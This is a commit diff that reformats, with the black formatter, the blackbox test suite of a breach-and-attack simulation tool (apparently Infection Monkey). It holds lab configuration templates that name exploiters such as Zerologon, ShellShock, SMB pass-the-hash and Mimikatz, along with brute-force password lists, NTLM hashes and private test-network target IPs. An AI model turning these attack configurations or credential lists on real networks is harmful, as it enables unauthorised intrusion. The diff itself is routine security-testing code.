forked from p15670423/monkey
Reformat all python with black v20.8b1
parent 7343b50135
commit c40f7bf6c9
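Every hunk below is a mechanical rewrite produced by black: string literals normalized to double quotes, long calls and collection literals exploded to one element per line with a trailing comma, backslash-continued lines converted to parenthesized ones, and the blank line between a class header and its first method dropped. A minimal before/after sketch of the quote and trailing-comma rules, reusing the TELEM_QUERY literal from the diff below (the commands and file layout are typical black usage, not taken from this commit):

# Sketch: `pip install black==20.8b1`, then `black --check .` lists files
# that would be reformatted and `black .` rewrites them in place.
# Given the pre-commit style:
#
#     TELEM_QUERY = {'telem_category': 'exploit',
#                    'data.exploiter': 'ZerologonExploiter',
#                    'data.info.password_restored': True}
#
# black v20.8b1 emits double quotes, one key per line, and a trailing comma:
TELEM_QUERY = {
    "telem_category": "exploit",
    "data.exploiter": "ZerologonExploiter",
    "data.info.password_restored": True,
}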
@@ -2,7 +2,6 @@ from abc import ABCMeta, abstractmethod
 
 
 class Analyzer(object, metaclass=ABCMeta):
-
     @abstractmethod
     def analyze_test_results(self) -> bool:
         raise NotImplementedError()
@@ -2,7 +2,6 @@ LOG_INIT_MESSAGE = "Analysis didn't run."
 
 
 class AnalyzerLog(object):
-
     def __init__(self, analyzer_name):
         self.contents = LOG_INIT_MESSAGE
         self.name = analyzer_name
@@ -3,7 +3,6 @@ from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
 
 
 class CommunicationAnalyzer(Analyzer):
-
     def __init__(self, island_client, machine_ips):
         self.island_client = island_client
         self.machine_ips = machine_ips
@@ -21,5 +20,5 @@ class CommunicationAnalyzer(Analyzer):
         return all_monkeys_communicated
 
     def did_monkey_communicate_back(self, machine_ip):
-        query = {'ip_addresses': {'$elemMatch': {'$eq': machine_ip}}}
+        query = {"ip_addresses": {"$elemMatch": {"$eq": machine_ip}}}
         return len(self.island_client.find_monkeys_in_db(query)) > 0
@@ -9,8 +9,9 @@ LOGGER = logging.getLogger(__name__)
 
 
 class PerformanceAnalyzer(Analyzer):
-
-    def __init__(self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]):
+    def __init__(
+        self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]
+    ):
         self.performance_test_config = performance_test_config
         self.endpoint_timings = endpoint_timings
 
@@ -3,19 +3,25 @@ from pprint import pformat
 
 import dpath.util
 
-from common.config_value_paths import USER_LIST_PATH, PASSWORD_LIST_PATH, NTLM_HASH_LIST_PATH, LM_HASH_LIST_PATH
+from common.config_value_paths import (
+    USER_LIST_PATH,
+    PASSWORD_LIST_PATH,
+    NTLM_HASH_LIST_PATH,
+    LM_HASH_LIST_PATH,
+)
 from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
 from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
 from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
 
 # Query for telemetry collection to see if password restoration was successful
-TELEM_QUERY = {'telem_category': 'exploit',
-               'data.exploiter': 'ZerologonExploiter',
-               'data.info.password_restored': True}
+TELEM_QUERY = {
+    "telem_category": "exploit",
+    "data.exploiter": "ZerologonExploiter",
+    "data.info.password_restored": True,
+}
 
 
 class ZerologonAnalyzer(Analyzer):
-
     def __init__(self, island_client: MonkeyIslandClient, expected_credentials: List[str]):
         self.island_client = island_client
         self.expected_credentials = expected_credentials
@@ -35,13 +41,12 @@ class ZerologonAnalyzer(Analyzer):
     @staticmethod
     def _get_relevant_credentials(config: dict):
         credentials_on_island = []
-        credentials_on_island.extend(dpath.util.get(config['configuration'], USER_LIST_PATH))
-        credentials_on_island.extend(dpath.util.get(config['configuration'], NTLM_HASH_LIST_PATH))
-        credentials_on_island.extend(dpath.util.get(config['configuration'], LM_HASH_LIST_PATH))
+        credentials_on_island.extend(dpath.util.get(config["configuration"], USER_LIST_PATH))
+        credentials_on_island.extend(dpath.util.get(config["configuration"], NTLM_HASH_LIST_PATH))
+        credentials_on_island.extend(dpath.util.get(config["configuration"], LM_HASH_LIST_PATH))
         return credentials_on_island
 
-    def _is_all_credentials_in_list(self,
-                                    all_creds: List[str]) -> bool:
+    def _is_all_credentials_in_list(self, all_creds: List[str]) -> bool:
         credentials_missing = [cred for cred in self.expected_credentials if cred not in all_creds]
         self._log_creds_not_gathered(credentials_missing)
         return not credentials_missing
@@ -60,11 +65,13 @@ class ZerologonAnalyzer(Analyzer):
 
     def _log_credential_restore(self, telem_list: List[dict]):
         if telem_list:
-            self.log.add_entry("Zerologon exploiter telemetry contains indicators that credentials "
-                               "were successfully restored.")
+            self.log.add_entry(
+                "Zerologon exploiter telemetry contains indicators that credentials "
+                "were successfully restored."
+            )
         else:
-            self.log.add_entry("Credential restore failed or credential restore "
-                               "telemetry not found on the Monkey Island.")
+            self.log.add_entry(
+                "Credential restore failed or credential restore "
+                "telemetry not found on the Monkey Island."
+            )
         self.log.add_entry(f"Query for credential restore telem: {pformat(TELEM_QUERY)}")
-
-
@@ -8,7 +8,9 @@ class BaseTemplate(ConfigTemplate):
         "basic.exploiters.exploiter_classes": [],
         "basic_network.scope.local_network_scan": False,
         "internal.classes.finger_classes": ["PingScanner", "HTTPFinger"],
-        "internal.monkey.system_info.system_info_collector_classes":
-            ["EnvironmentCollector", "HostnameCollector"],
-        "monkey.post_breach.post_breach_actions": []
+        "internal.monkey.system_info.system_info_collector_classes": [
+            "EnvironmentCollector",
+            "HostnameCollector",
+        ],
+        "monkey.post_breach.post_breach_actions": [],
     }
@@ -2,7 +2,6 @@ from abc import ABC, abstractmethod
 
 
 class ConfigTemplate(ABC):
-
     @property
     @abstractmethod
     def config_values(self) -> dict:
@@ -7,8 +7,10 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
 class Drupal(ConfigTemplate):
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "internal.classes.finger_classes": ["PingScanner", "HTTPFinger"],
-        "basic.exploiters.exploiter_classes": ["DrupalExploiter"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.28"]
-    })
+    config_values.update(
+        {
+            "internal.classes.finger_classes": ["PingScanner", "HTTPFinger"],
+            "basic.exploiters.exploiter_classes": ["DrupalExploiter"],
+            "basic_network.scope.subnet_scan_list": ["10.2.2.28"],
+        }
+    )
@@ -8,8 +8,10 @@ class Elastic(ConfigTemplate):
 
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"],
-        "internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"]
-    })
+    config_values.update(
+        {
+            "basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"],
+            "internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"],
+            "basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"],
+        }
+    )
@@ -8,7 +8,9 @@ class Hadoop(ConfigTemplate):
 
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "basic.exploiters.exploiter_classes": ["HadoopExploiter"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"]
-    })
+    config_values.update(
+        {
+            "basic.exploiters.exploiter_classes": ["HadoopExploiter"],
+            "basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"],
+        }
+    )
@@ -7,14 +7,16 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
 class Mssql(ConfigTemplate):
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "basic.exploiters.exploiter_classes": ["MSSQLExploiter"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.16"],
-        "basic.credentials.exploit_password_list": ["Password1!",
-                                                    "Xk8VDTsC",
-                                                    "password",
-                                                    "12345678"],
-        "basic.credentials.exploit_user_list": ["Administrator",
-                                                "m0nk3y",
-                                                "user"]
-    })
+    config_values.update(
+        {
+            "basic.exploiters.exploiter_classes": ["MSSQLExploiter"],
+            "basic_network.scope.subnet_scan_list": ["10.2.2.16"],
+            "basic.credentials.exploit_password_list": [
+                "Password1!",
+                "Xk8VDTsC",
+                "password",
+                "12345678",
+            ],
+            "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
+        }
+    )
@@ -3,52 +3,60 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
 
 class Performance(ConfigTemplate):
     config_values = {
-        "basic.credentials.exploit_password_list": ["Xk8VDTsC",
-                                                    "^NgDvY59~8",
-                                                    "Ivrrw5zEzs",
-                                                    "3Q=(Ge(+&w]*",
-                                                    "`))jU7L(w}",
-                                                    "t67TC5ZDmz"],
+        "basic.credentials.exploit_password_list": [
+            "Xk8VDTsC",
+            "^NgDvY59~8",
+            "Ivrrw5zEzs",
+            "3Q=(Ge(+&w]*",
+            "`))jU7L(w}",
+            "t67TC5ZDmz",
+        ],
         "basic.credentials.exploit_user_list": ["m0nk3y"],
-        "basic.exploiters.exploiter_classes": ["SmbExploiter",
-                                               "WmiExploiter",
-                                               "SSHExploiter",
-                                               "ShellShockExploiter",
-                                               "SambaCryExploiter",
-                                               "ElasticGroovyExploiter",
-                                               "Struts2Exploiter",
-                                               "WebLogicExploiter",
-                                               "HadoopExploiter",
-                                               "VSFTPDExploiter",
-                                               "MSSQLExploiter",
-                                               "ZerologonExploiter"],
-        "basic_network.network_analysis.inaccessible_subnets": ["10.2.2.0/30",
-                                                                "10.2.2.8/30",
-                                                                "10.2.2.24/32",
-                                                                "10.2.2.23/32",
-                                                                "10.2.2.21/32",
-                                                                "10.2.2.19/32",
-                                                                "10.2.2.18/32",
-                                                                "10.2.2.17/32"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.2",
-                                                 "10.2.2.3",
-                                                 "10.2.2.4",
-                                                 "10.2.2.5",
-                                                 "10.2.2.8",
-                                                 "10.2.2.9",
-                                                 "10.2.1.10",
-                                                 "10.2.0.11",
-                                                 "10.2.0.12",
-                                                 "10.2.2.11",
-                                                 "10.2.2.12",
-                                                 "10.2.2.14",
-                                                 "10.2.2.15",
-                                                 "10.2.2.16",
-                                                 "10.2.2.18",
-                                                 "10.2.2.19",
-                                                 "10.2.2.20",
-                                                 "10.2.2.21",
-                                                 "10.2.2.23",
-                                                 "10.2.2.24",
-                                                 "10.2.2.25"]
+        "basic.exploiters.exploiter_classes": [
+            "SmbExploiter",
+            "WmiExploiter",
+            "SSHExploiter",
+            "ShellShockExploiter",
+            "SambaCryExploiter",
+            "ElasticGroovyExploiter",
+            "Struts2Exploiter",
+            "WebLogicExploiter",
+            "HadoopExploiter",
+            "VSFTPDExploiter",
+            "MSSQLExploiter",
+            "ZerologonExploiter",
+        ],
+        "basic_network.network_analysis.inaccessible_subnets": [
+            "10.2.2.0/30",
+            "10.2.2.8/30",
+            "10.2.2.24/32",
+            "10.2.2.23/32",
+            "10.2.2.21/32",
+            "10.2.2.19/32",
+            "10.2.2.18/32",
+            "10.2.2.17/32",
+        ],
+        "basic_network.scope.subnet_scan_list": [
+            "10.2.2.2",
+            "10.2.2.3",
+            "10.2.2.4",
+            "10.2.2.5",
+            "10.2.2.8",
+            "10.2.2.9",
+            "10.2.1.10",
+            "10.2.0.11",
+            "10.2.0.12",
+            "10.2.2.11",
+            "10.2.2.12",
+            "10.2.2.14",
+            "10.2.2.15",
+            "10.2.2.16",
+            "10.2.2.18",
+            "10.2.2.19",
+            "10.2.2.20",
+            "10.2.2.21",
+            "10.2.2.23",
+            "10.2.2.24",
+            "10.2.2.25",
+        ],
     }
@@ -7,7 +7,9 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
 class ShellShock(ConfigTemplate):
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "basic.exploiters.exploiter_classes": ["ShellShockExploiter"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.8"]
-    })
+    config_values.update(
+        {
+            "basic.exploiters.exploiter_classes": ["ShellShockExploiter"],
+            "basic_network.scope.subnet_scan_list": ["10.2.2.8"],
+        }
+    )
@@ -7,14 +7,18 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
 class SmbMimikatz(ConfigTemplate):
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "basic.exploiters.exploiter_classes": ["SmbExploiter"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"],
-        "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
-        "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
-        "internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"],
-        "monkey.system_info.system_info_collector_classes": ["EnvironmentCollector",
-                                                             "HostnameCollector",
-                                                             "ProcessListCollector",
-                                                             "MimikatzCollector"]
-    })
+    config_values.update(
+        {
+            "basic.exploiters.exploiter_classes": ["SmbExploiter"],
+            "basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"],
+            "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
+            "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
+            "internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"],
+            "monkey.system_info.system_info_collector_classes": [
+                "EnvironmentCollector",
+                "HostnameCollector",
+                "ProcessListCollector",
+                "MimikatzCollector",
+            ],
+        }
+    )
@@ -11,12 +11,10 @@ class SmbPth(ConfigTemplate):
         "basic.exploiters.exploiter_classes": ["SmbExploiter"],
         "basic_network.scope.subnet_scan_list": ["10.2.2.15"],
         "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
-        "basic.credentials.exploit_user_list": ["Administrator",
-                                                "m0nk3y",
-                                                "user"],
-        "internal.classes.finger_classes": ["SMBFinger",
-                                            "PingScanner",
-                                            "HTTPFinger"],
-        "internal.classes.exploits.exploit_ntlm_hash_list": ["5da0889ea2081aa79f6852294cba4a5e",
-                                                             "50c9987a6bf1ac59398df9f911122c9b"]
+        "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
+        "internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"],
+        "internal.classes.exploits.exploit_ntlm_hash_list": [
+            "5da0889ea2081aa79f6852294cba4a5e",
+            "50c9987a6bf1ac59398df9f911122c9b",
+        ],
     }
@@ -7,17 +7,12 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
 class Ssh(ConfigTemplate):
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "basic.exploiters.exploiter_classes": ["SSHExploiter"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.11",
-                                                 "10.2.2.12"],
-        "basic.credentials.exploit_password_list": ["Password1!",
-                                                    "12345678",
-                                                    "^NgDvY59~8"],
-        "basic.credentials.exploit_user_list": ["Administrator",
-                                                "m0nk3y",
-                                                "user"],
-        "internal.classes.finger_classes": ["SSHFinger",
-                                            "PingScanner",
-                                            "HTTPFinger"]
-    })
+    config_values.update(
+        {
+            "basic.exploiters.exploiter_classes": ["SSHExploiter"],
+            "basic_network.scope.subnet_scan_list": ["10.2.2.11", "10.2.2.12"],
+            "basic.credentials.exploit_password_list": ["Password1!", "12345678", "^NgDvY59~8"],
+            "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
+            "internal.classes.finger_classes": ["SSHFinger", "PingScanner", "HTTPFinger"],
+        }
+    )
@@ -8,7 +8,9 @@ class Struts2(ConfigTemplate):
 
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "basic.exploiters.exploiter_classes": ["Struts2Exploiter"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"]
-    })
+    config_values.update(
+        {
+            "basic.exploiters.exploiter_classes": ["Struts2Exploiter"],
+            "basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"],
+        }
+    )
@@ -7,27 +7,30 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
 class Tunneling(ConfigTemplate):
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "basic.exploiters.exploiter_classes": ["SmbExploiter",
-                                               "WmiExploiter",
-                                               "SSHExploiter"
-                                               ],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.9",
-                                                 "10.2.1.10",
-                                                 "10.2.0.11",
-                                                 "10.2.0.12"],
-        "basic_network.scope.depth": 3,
-        "internal.general.keep_tunnel_open_time": 180,
-        "basic.credentials.exploit_password_list": ["Password1!",
-                                                    "3Q=(Ge(+&w]*",
-                                                    "`))jU7L(w}",
-                                                    "t67TC5ZDmz",
-                                                    "12345678"],
-        "basic.credentials.exploit_user_list": ["Administrator",
-                                                "m0nk3y",
-                                                "user"],
-        "internal.classes.finger_classes": ["SSHFinger",
-                                            "PingScanner",
-                                            "HTTPFinger",
-                                            "SMBFinger"]
-    })
+    config_values.update(
+        {
+            "basic.exploiters.exploiter_classes": ["SmbExploiter", "WmiExploiter", "SSHExploiter"],
+            "basic_network.scope.subnet_scan_list": [
+                "10.2.2.9",
+                "10.2.1.10",
+                "10.2.0.11",
+                "10.2.0.12",
+            ],
+            "basic_network.scope.depth": 3,
+            "internal.general.keep_tunnel_open_time": 180,
+            "basic.credentials.exploit_password_list": [
+                "Password1!",
+                "3Q=(Ge(+&w]*",
+                "`))jU7L(w}",
+                "t67TC5ZDmz",
+                "12345678",
+            ],
+            "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
+            "internal.classes.finger_classes": [
+                "SSHFinger",
+                "PingScanner",
+                "HTTPFinger",
+                "SMBFinger",
+            ],
+        }
+    )
@@ -8,7 +8,9 @@ class Weblogic(ConfigTemplate):
 
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "basic.exploiters.exploiter_classes": ["WebLogicExploiter"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"]
-    })
+    config_values.update(
+        {
+            "basic.exploiters.exploiter_classes": ["WebLogicExploiter"],
+            "basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"],
+        }
+    )
@@ -7,17 +7,17 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
 class WmiMimikatz(ConfigTemplate):
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "basic.exploiters.exploiter_classes": ["WmiExploiter"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.14",
-                                                 "10.2.2.15"],
-        "basic.credentials.exploit_password_list": ["Password1!",
-                                                    "Ivrrw5zEzs"],
-        "basic.credentials.exploit_user_list": ["Administrator",
-                                                "m0nk3y",
-                                                "user"],
-        "monkey.system_info.system_info_collector_classes": ["EnvironmentCollector",
-                                                             "HostnameCollector",
-                                                             "ProcessListCollector",
-                                                             "MimikatzCollector"]
-    })
+    config_values.update(
+        {
+            "basic.exploiters.exploiter_classes": ["WmiExploiter"],
+            "basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"],
+            "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
+            "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
+            "monkey.system_info.system_info_collector_classes": [
+                "EnvironmentCollector",
+                "HostnameCollector",
+                "ProcessListCollector",
+                "MimikatzCollector",
+            ],
+        }
+    )
@@ -8,9 +8,11 @@ class Zerologon(ConfigTemplate):
 
     config_values = copy(BaseTemplate.config_values)
 
-    config_values.update({
-        "basic.exploiters.exploiter_classes": ["ZerologonExploiter"],
-        "basic_network.scope.subnet_scan_list": ["10.2.2.25"],
-        # Empty list to make sure ZeroLogon adds "Administrator" username
-        "basic.credentials.exploit_user_list": []
-    })
+    config_values.update(
+        {
+            "basic.exploiters.exploiter_classes": ["ZerologonExploiter"],
+            "basic_network.scope.subnet_scan_list": ["10.2.2.25"],
+            # Empty list to make sure ZeroLogon adds "Administrator" username
+            "basic.credentials.exploit_user_list": [],
+        }
+    )
@@ -2,25 +2,37 @@ import pytest
 
 
 def pytest_addoption(parser):
-    parser.addoption("--island", action="store", default="",
-                     help="Specify the Monkey Island address (host+port).")
-    parser.addoption("--no-gcp", action="store_true", default=False,
-                     help="Use for no interaction with the cloud.")
-    parser.addoption("--quick-performance-tests", action="store_true", default=False,
-                     help="If enabled performance tests won't reset island and won't send telemetries, "
-                          "instead will just test performance of already present island state.")
+    parser.addoption(
+        "--island",
+        action="store",
+        default="",
+        help="Specify the Monkey Island address (host+port).",
+    )
+    parser.addoption(
+        "--no-gcp",
+        action="store_true",
+        default=False,
+        help="Use for no interaction with the cloud.",
+    )
+    parser.addoption(
+        "--quick-performance-tests",
+        action="store_true",
+        default=False,
+        help="If enabled performance tests won't reset island and won't send telemetries, "
+        "instead will just test performance of already present island state.",
+    )
 
 
-@pytest.fixture(scope='session')
+@pytest.fixture(scope="session")
 def island(request):
     return request.config.getoption("--island")
 
 
-@pytest.fixture(scope='session')
+@pytest.fixture(scope="session")
 def no_gcp(request):
     return request.config.getoption("--no-gcp")
 
 
-@pytest.fixture(scope='session')
+@pytest.fixture(scope="session")
 def quick_performance_tests(request):
     return request.config.getoption("--quick-performance-tests")
@@ -8,23 +8,22 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
 
 
 class IslandConfigParser:
-
     @staticmethod
-    def get_raw_config(config_template: Type[ConfigTemplate],
-                       island_client: MonkeyIslandClient) -> str:
+    def get_raw_config(
+        config_template: Type[ConfigTemplate], island_client: MonkeyIslandClient
+    ) -> str:
         response = island_client.get_config()
-        config = IslandConfigParser.apply_template_to_config(config_template, response['configuration'])
+        config = IslandConfigParser.apply_template_to_config(
+            config_template, response["configuration"]
+        )
         return json.dumps(config)
 
     @staticmethod
-    def apply_template_to_config(config_template: Type[ConfigTemplate],
-                                 config: dict) -> dict:
+    def apply_template_to_config(config_template: Type[ConfigTemplate], config: dict) -> dict:
         for path, value in config_template.config_values.items():
-            dpath.util.set(config, path, value, '.')
+            dpath.util.set(config, path, value, ".")
         return config
 
     @staticmethod
     def get_ips_of_targets(raw_config):
-        return dpath.util.get(json.loads(raw_config),
-                              "basic_network.scope.subnet_scan_list",
-                              '.')
+        return dpath.util.get(json.loads(raw_config), "basic_network.scope.subnet_scan_list", ".")
@@ -8,9 +8,9 @@ from bson import json_util
 from envs.monkey_zoo.blackbox.island_client.monkey_island_requests import MonkeyIslandRequests
 
 SLEEP_BETWEEN_REQUESTS_SECONDS = 0.5
-MONKEY_TEST_ENDPOINT = 'api/test/monkey'
-TELEMETRY_TEST_ENDPOINT = 'api/test/telemetry'
-LOG_TEST_ENDPOINT = 'api/test/log'
+MONKEY_TEST_ENDPOINT = "api/test/monkey"
+TELEMETRY_TEST_ENDPOINT = "api/test/telemetry"
+LOG_TEST_ENDPOINT = "api/test/log"
 LOGGER = logging.getLogger(__name__)
 
 
@@ -44,7 +44,7 @@ class MonkeyIslandClient(object):
 
     @staticmethod
     def monkey_ran_successfully(response):
-        return response.ok and json.loads(response.content)['is_running']
+        return response.ok and json.loads(response.content)["is_running"]
 
     @avoid_race_condition
     def kill_all_monkeys(self):
@@ -65,37 +65,41 @@ class MonkeyIslandClient(object):
     def find_monkeys_in_db(self, query):
         if query is None:
             raise TypeError
-        response = self.requests.get(MONKEY_TEST_ENDPOINT,
-                                     MonkeyIslandClient.form_find_query_for_request(query))
+        response = self.requests.get(
+            MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
+        )
         return MonkeyIslandClient.get_test_query_results(response)
 
     def find_telems_in_db(self, query: dict):
         if query is None:
             raise TypeError
-        response = self.requests.get(TELEMETRY_TEST_ENDPOINT,
-                                     MonkeyIslandClient.form_find_query_for_request(query))
+        response = self.requests.get(
+            TELEMETRY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
+        )
         return MonkeyIslandClient.get_test_query_results(response)
 
     def get_all_monkeys_from_db(self):
-        response = self.requests.get(MONKEY_TEST_ENDPOINT,
-                                     MonkeyIslandClient.form_find_query_for_request(None))
+        response = self.requests.get(
+            MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(None)
+        )
         return MonkeyIslandClient.get_test_query_results(response)
 
     def find_log_in_db(self, query):
-        response = self.requests.get(LOG_TEST_ENDPOINT,
-                                     MonkeyIslandClient.form_find_query_for_request(query))
+        response = self.requests.get(
+            LOG_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
+        )
         return MonkeyIslandClient.get_test_query_results(response)
 
     @staticmethod
     def form_find_query_for_request(query: Union[dict, None]) -> dict:
-        return {'find_query': json_util.dumps(query)}
+        return {"find_query": json_util.dumps(query)}
 
     @staticmethod
     def get_test_query_results(response):
-        return json.loads(response.content)['results']
+        return json.loads(response.content)["results"]
 
     def is_all_monkeys_dead(self):
-        query = {'dead': False}
+        query = {"dead": False}
         return len(self.find_monkeys_in_db(query)) == 0
 
     def clear_caches(self):
@@ -8,8 +8,10 @@ import requests
 from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
 
 # SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
-NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
-                '8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'
+NO_AUTH_CREDS = (
+    "55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062"
+    "8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557"
+)
 LOGGER = logging.getLogger(__name__)
 
 
@@ -18,10 +20,12 @@ class MonkeyIslandRequests(object):
     def __init__(self, server_address):
         self.addr = "https://{IP}/".format(IP=server_address)
         self.token = self.try_get_jwt_from_server()
-        self.supported_request_methods = {SupportedRequestMethod.GET: self.get,
-                                          SupportedRequestMethod.POST: self.post,
-                                          SupportedRequestMethod.PATCH: self.patch,
-                                          SupportedRequestMethod.DELETE: self.delete}
+        self.supported_request_methods = {
+            SupportedRequestMethod.GET: self.get,
+            SupportedRequestMethod.POST: self.post,
+            SupportedRequestMethod.PATCH: self.patch,
+            SupportedRequestMethod.DELETE: self.delete,
+        }
 
     def get_request_time(self, url, method: SupportedRequestMethod, data=None):
         response = self.send_request_by_method(url, method, data)
@@ -44,7 +48,10 @@ class MonkeyIslandRequests(object):
             return self.get_jwt_from_server()
         except requests.ConnectionError as err:
             LOGGER.error(
-                "Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr))
+                "Unable to connect to island, aborting! Error information: {}. Server: {}".format(
+                    err, self.addr
+                )
+            )
             assert False
 
     class _Decorators:
@@ -59,45 +66,45 @@ class MonkeyIslandRequests(object):
             return request_function_wrapper
 
     def get_jwt_from_server(self):
-        resp = requests.post(self.addr + "api/auth",  # noqa: DUO123
-                             json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
-                             verify=False)
+        resp = requests.post(
+            self.addr + "api/auth",  # noqa: DUO123
+            json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
+            verify=False,
+        )
         return resp.json()["access_token"]
 
     @_Decorators.refresh_jwt_token
     def get(self, url, data=None):
-        return requests.get(self.addr + url,  # noqa: DUO123
-                            headers=self.get_jwt_header(),
-                            params=data,
-                            verify=False)
+        return requests.get(
+            self.addr + url,  # noqa: DUO123
+            headers=self.get_jwt_header(),
+            params=data,
+            verify=False,
+        )
 
     @_Decorators.refresh_jwt_token
     def post(self, url, data):
-        return requests.post(self.addr + url,  # noqa: DUO123
-                             data=data,
-                             headers=self.get_jwt_header(),
-                             verify=False)
+        return requests.post(
+            self.addr + url, data=data, headers=self.get_jwt_header(), verify=False  # noqa: DUO123
+        )
 
     @_Decorators.refresh_jwt_token
     def post_json(self, url, data: Dict):
-        return requests.post(self.addr + url,  # noqa: DUO123
-                             json=data,
-                             headers=self.get_jwt_header(),
-                             verify=False)
+        return requests.post(
+            self.addr + url, json=data, headers=self.get_jwt_header(), verify=False  # noqa: DUO123
+        )
 
     @_Decorators.refresh_jwt_token
     def patch(self, url, data: Dict):
-        return requests.patch(self.addr + url,  # noqa: DUO123
-                              data=data,
-                              headers=self.get_jwt_header(),
-                              verify=False)
+        return requests.patch(
+            self.addr + url, data=data, headers=self.get_jwt_header(), verify=False  # noqa: DUO123
+        )
 
     @_Decorators.refresh_jwt_token
     def delete(self, url):
         return requests.delete(  # noqa: DOU123
-            self.addr + url,
-            headers=self.get_jwt_header(),
-            verify=False)
+            self.addr + url, headers=self.get_jwt_header(), verify=False
+        )
 
     @_Decorators.refresh_jwt_token
     def get_jwt_header(self):
@@ -12,16 +12,16 @@ class MonkeyLog(object):
         self.log_dir_path = log_dir_path
 
     def download_log(self, island_client):
-        log = island_client.find_log_in_db({'monkey_id': ObjectId(self.monkey['id'])})
+        log = island_client.find_log_in_db({"monkey_id": ObjectId(self.monkey["id"])})
         if not log:
-            LOGGER.error("Log for monkey {} not found".format(self.monkey['ip_addresses'][0]))
+            LOGGER.error("Log for monkey {} not found".format(self.monkey["ip_addresses"][0]))
             return False
         else:
             self.write_log_to_file(log)
             return True
 
     def write_log_to_file(self, log):
-        with open(self.get_log_path_for_monkey(self.monkey), 'w') as log_file:
+        with open(self.get_log_path_for_monkey(self.monkey), "w") as log_file:
             log_file.write(MonkeyLog.parse_log(log))
 
     @staticmethod
@@ -32,7 +32,7 @@ class MonkeyLog(object):
 
     @staticmethod
     def get_filename_for_monkey_log(monkey):
-        return "{}.txt".format(monkey['ip_addresses'][0])
